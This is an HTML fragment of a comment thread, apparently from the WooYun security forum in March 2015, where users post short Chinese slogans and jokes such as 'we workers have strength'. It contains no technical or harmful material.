class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">xyang</span> <span class="reply-time">2015-03-27 14:34:28</span></div><p></p><p>咱们工人有力量</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">Gnest</span> <span class="reply-time">2015-03-27 14:26:44</span></div><p></p><p>咱们工人有力量！</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">gainover</span> <span class="reply-time">2015-03-27 14:19:56</span></div><p></p><p>咱们工人有力量！</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">xsser</span> <span class="reply-time">2015-03-27 14:15:53</span></div><p></p><p>全国最大的信息安全从业人员同性交友社区表示躺了</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">xiaoL</span> <span class="reply-time">2015-03-27 14:15:25</span></div><p></p><p>好酷啊！哈哈！</p><p></p></div></div></div></div></div></main>